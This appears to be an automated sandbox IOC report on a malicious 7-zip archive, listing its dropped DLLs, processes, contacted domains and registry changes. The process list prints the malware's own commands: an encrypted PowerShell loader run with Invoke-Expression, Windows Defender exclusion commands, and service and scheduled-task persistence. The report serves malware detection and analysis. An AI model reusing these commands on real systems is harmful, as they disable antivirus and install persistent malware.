IOC Report
F.7z

loading gif

Files

File Path
Type
Category
Malicious
F.7z
7-zip archive data, version 0.3
initial sample
malicious
C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Windows \System32\x249569.dat
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Windows\System32\console_zero.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Windows\System32\libcrypto-3-x64.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Windows\System32\libcurl.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Windows\System32\libiconv-2.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
malicious
C:\Windows\System32\libpq.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
malicious
C:\Windows\System32\libssl-3-x64.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Windows\System32\libwinpthread-1.dll
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Windows\System32\ucrtbased.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
malicious
C:\Windows\System32\usvc.dat
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
malicious
C:\Windows\System32\x338625.dat
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
malicious
C:\Windows\System32\zlib1.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xb5c00497, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.0b187b60-ed6a-453b-9aff-eda3b85b7035.1.etl
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\7zE4809A201\USB Drive.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=8, Archive, ctime=Thu Aug 8 07:16:37 2024, mtime=Thu Aug 8 07:16:38 2024, atime=Thu Aug 8 07:16:38 2024, length=119, window=hide
dropped
C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\rootcomp.dat
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x447823.vbs
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x447823.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x615759.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wn1ecln.tuk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3fu1l0v0.cbx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53q0npks.lt3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bw2zkhys.55z.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l32hkzye.ly0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5hdl2yn.aii.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwt3wfbn.l0u.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2d0yeu3.tym.ps1
ASCII text, with no line terminators
dropped
C:\Windows \System32\printui.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
Unicode text, UTF-16, little-endian text, with CRLF line terminators
modified
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Windows\System32\libintl-9.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Windows\System32\vcruntime140d.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Windows\System32\winsvcf\winlogsvc
data
dropped
C:\Windows\Temp\__PSScriptPolicyTest_0ghp043h.dmh.ps1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_4lstyury.hfh.ps1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_adgvbmpi.iw2.psm1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_asq5knkp.d41.ps1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_goxzkcnz.o3l.psm1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_izv5uqzl.mmh.ps1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_jeblxzpw.dor.ps1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_ngv5j5oz.ofy.ps1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_nuva0yqe.5go.psm1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_rkmfjoz3.ldm.psm1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_undw3f4t.tra.psm1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_vudgegsv.hcb.psm1
ASCII text, with no line terminators
dropped
There are 41 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
malicious
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
malicious
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "
malicious
C:\Windows \System32\printui.exe
"C:\Windows \System32\printui.exe"
malicious
C:\Windows \System32\printui.exe
"C:\Windows \System32\printui.exe"
malicious
C:\Windows \System32\printui.exe
"C:\Windows \System32\printui.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f && sc start x338625
malicious
C:\Windows\System32\sc.exe
sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
malicious
C:\Windows\System32\reg.exe
reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
malicious
C:\Windows\System32\sc.exe
sc start x338625
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k DcomLaunch
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
malicious
C:\Windows\System32\console_zero.exe
"C:\Windows\System32\console_zero.exe"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c schtasks /delete /tn "console_zero" /f
malicious
C:\Windows\System32\schtasks.exe
schtasks /delete /tn "console_zero" /f
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
malicious
C:\Windows\System32\schtasks.exe
schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
malicious
C:\Windows\System32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\SgrmBroker.exe
C:\Windows\system32\SgrmBroker.exe
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\Fzip"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\explorer.exe
explorer "..\USB Drive"
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\xcopy.exe
xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y
C:\Windows\System32\xcopy.exe
xcopy "x249569.dat" "C:\Windows \System32" /Y
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\timeout.exe
timeout /t 10 /nobreak
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 45 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://dev.ditu.live.com/REST/v1/Routes/
unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
unknown
https://contoso.com/License
unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net
unknown
https://www.openssl.org/
unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx
unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
unknown
https://curl.se/docs/hsts.html
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
unknown
https://curl.se/docs/alt-svc.html#
unknown
https://curl.se/
unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/
unknown
https://curl.se/docs/hsts.html#
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://ipinfo.io/json
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.bingmapsportal.com
unknown
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
unknown
http://www.gnu.org/licenses/
unknown
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
unknown
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://curl.se/docs/http-cookies.html
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://dev.ditu.live.com/REST/v1/Transit/Stops/
unknown
https://dev.virtualearth.net/REST/v1/Routes/
unknown
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
unknown
https://contoso.com/Icon
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
unknown
https://www.gnu.org/licenses/
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
unknown
http://crl.ver)
unknown
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
unknown
https://g.live.com/odclientsettings/ProdV2/C:
unknown
https://curl.se/docs/alt-svc.html
unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
unknown
https://dev.virtualearth.net/REST/v1/Locations
unknown
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
unknown
https://dev.virtualearth.net/mapcontrol/logging.ashx
unknown
https://github.com/Pester/Pester
unknown
https://curl.se/docs/copyright.htmlD
unknown
https://g.live.com/odclientsettings/Prod/C:
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
unknown
http://worldtimeapi.org/api/timezone/Etc/UTCnB
unknown
http://www.zlib.net/
unknown
https://dynamic.t
unknown
http://mingw-w64.sourceforge.net/X
unknown
https://curl.se/docs/copyright.html
unknown
http://worldtimeapi.org/api/timezone/Etc/UTC
213.188.196.246
http://www.zlib.net/D
unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://www.openssl.org/H
unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
unknown
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
unknown
http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;
unknown
https://aka.ms/pscore68
unknown
https://curl.se/docs/http-cookies.html#
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
unknown
https://dev.ditu.live.com/REST/v1/Locations
unknown
https://curl.se/V
unknown
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
unknown
There are 59 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
worldtimeapi.org
213.188.196.246
ipinfo.io
34.117.59.81
universalsqlserver.privatelink.postgres.database.azure.com
20.71.50.126
universalsqlserver.postgres.database.azure.com
unknown

IPs

IP
Domain
Country
Malicious
213.188.196.246
worldtimeapi.org
Italy
34.117.59.81
ipinfo.io
United States
20.71.50.126
universalsqlserver.privatelink.postgres.database.azure.com
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
cval
malicious
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x338625\Parameters
ServiceDll
malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Mozilla Firefox\firefox.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Mozilla Firefox\firefox.exe.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Internet Explorer\iexplore.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Internet Explorer\iexplore.exe.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\mspaint.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\mspaint.exe.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\NOTEPAD.EXE.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\NOTEPAD.EXE.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Microsoft Office\root\Office16\Winword.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Microsoft Office\root\Office16\Winword.exe.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Windows Media Player\wmplayer.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Windows Media Player\wmplayer.exe.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Windows NT\Accessories\WORDPAD.EXE.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Windows NT\Accessories\WORDPAD.EXE.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WMI\Security
c688cf83-9945-5ff6-0e1e-1ff1f8a2ec9a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator
StartWorkerOnServiceStart
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\Scheduler
Checking to see if mostack override has changed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\Scheduler
CleanupUsoLogs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\Scheduler
UsoCrmScan
HKEY_CURRENT_USER\SOFTWARE\7-Zip\FM
FolderShortcuts
HKEY_CURRENT_USER\SOFTWARE\7-Zip\FM
FolderHistory
HKEY_CURRENT_USER\SOFTWARE\7-Zip\FM
PanelPath0
HKEY_CURRENT_USER\SOFTWARE\7-Zip\FM
FlatViewArc0
HKEY_CURRENT_USER\SOFTWARE\7-Zip\FM
PanelPath1
HKEY_CURRENT_USER\SOFTWARE\7-Zip\FM
FlatViewArc1
HKEY_CURRENT_USER\SOFTWARE\7-Zip\FM
ListMode
HKEY_CURRENT_USER\SOFTWARE\7-Zip\FM
Position
HKEY_CURRENT_USER\SOFTWARE\7-Zip\FM
Panels
HKEY_CURRENT_USER\SOFTWARE\7-Zip\FM\Columns
7-Zip.7z
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3
1
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\1
NodeSlot
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\1
MRUListEx
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell
SniffedFolderType
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1f\417C44EB
@C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\oregres.dll,-101
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1f\417C44EB
@C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\oregres.dll,-123
HKEY_CURRENT_USER_Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe%5Cmicrosoft.system.package.metadata%5CS-1-5-21-2246122658-3693405117-2476756634-1003-MergedResources-0.pri\1d9f5d7d6155f79\50e7d6fd
@{microsoft.zunemusic_10.19071.19011.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunemusic/files/assets/fileextension.png}
HKEY_CURRENT_USER_Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ad0dfbb57c2e\b258eb92
@{microsoft.windows.photos_2019.19071.12548.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.windows.photos/files/assets/photoslogoextensions.png}
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
MRUListEx
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3
MRUListEx
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
NodeSlots
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PrinterInstallation
UIEntry
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Power
HiberbootEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
DcomLaunch
There are 40 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
46E97FE000
unkown
page readonly
24D36C72000
heap
page read and write
98F267E000
stack
page read and write
24D2E496000
heap
page read and write
274DA280000
heap
page read and write
24D34B12000
heap
page read and write
24D363F1000
heap
page read and write
1E2803A6000
heap
page read and write
1CB997E0000
heap
page read and write
6D82000
heap
page read and write
1600639B000
heap
page read and write
24D3B140000
heap
page read and write
16006313000
heap
page read and write
1E28036F000
heap
page read and write
1C7C0349000
trusted library allocation
page read and write
24D31BCA000
heap
page read and write
1CEC18B7000
heap
page read and write
117F000
heap
page read and write
7FF9C502D000
trusted library allocation
page execute and read and write
17084930000
heap
page read and write
38F3000
heap
page read and write
1708507F000
heap
page read and write
6DB387E000
unkown
page readonly
1DEFEA50000
heap
page read and write
1708507A000
heap
page read and write
17085070000
heap
page read and write
24D34811000
heap
page read and write
7FF9C5AE0000
trusted library allocation
page read and write
150FC880000
trusted library allocation
page read and write
1708504F000
heap
page read and write
1708508F000
heap
page read and write
1E28050B000
heap
page read and write
24D2E468000
heap
page read and write
16006370000
heap
page read and write
24D34210000
heap
page read and write
1DEFEA55000
heap
page read and write
1708507B000
heap
page read and write
7FF9C5850000
trusted library allocation
page read and write
7FF9C5434000
trusted library allocation
page read and write
7FF9C5330000
trusted library allocation
page read and write
150FB1D0000
trusted library allocation
page read and write
24D369F2000
heap
page read and write
170851CE000
heap
page read and write
24D35360000
heap
page read and write
24200FA000
stack
page read and write
150FB20A000
heap
page read and write
24D36230000
heap
page read and write
1E375E8D000
heap
page read and write
24D3B6C1000
heap
page read and write
5BF27F000
stack
page read and write
7FF9C52A0000
trusted library allocation
page read and write
1CB997E8000
heap
page read and write
26B9E270000
heap
page read and write
24D365B1000
heap
page read and write
150FB290000
heap
page read and write
24D31BCD000
heap
page read and write
170877CD000
heap
page read and write
17082FCC000
heap
page read and write
24D34A92000
heap
page read and write
24D33910000
heap
page read and write
70B9000
heap
page read and write
682A1000
unkown
page read and write
7FF9C54B0000
trusted library allocation
page read and write
24D34090000
heap
page read and write
1C7C0345000
trusted library allocation
page read and write
17085073000
heap
page read and write
1708517A000
heap
page read and write
24D33D11000
heap
page read and write
1DEFEA3F000
heap
page read and write
24D32ED0000
heap
page read and write
150FCA0F000
heap
page read and write
947867E000
stack
page read and write
24D34390000
heap
page read and write
7FF9C54E0000
trusted library allocation
page read and write
16006398000
heap
page read and write
1FED59A7000
heap
page read and write
24D3006F000
heap
page read and write
1C7BD615000
heap
page read and write
24D355E1000
heap
page read and write
1E2803D1000
heap
page read and write
24D3B541000
heap
page read and write
7FFA2CEF0000
unkown
page readonly
1708521B000
heap
page read and write
17082FBA000
heap
page read and write
24D3B841000
heap
page read and write
7FF9C50DC000
trusted library allocation
page execute and read and write
1C7C10FE000
trusted library allocation
page read and write
24D362B0000
heap
page read and write
46E8CFE000
unkown
page readonly
1708505F000
heap
page read and write
24D35CA2000
heap
page read and write
1A6B6402000
trusted library allocation
page read and write
7FF9C52C5000
trusted library allocation
page read and write
17085047000
heap
page read and write
1ADD0810000
heap
page read and write
7FF9C5830000
trusted library allocation
page read and write
1E28040C000
heap
page read and write
1E2803A6000
heap
page read and write
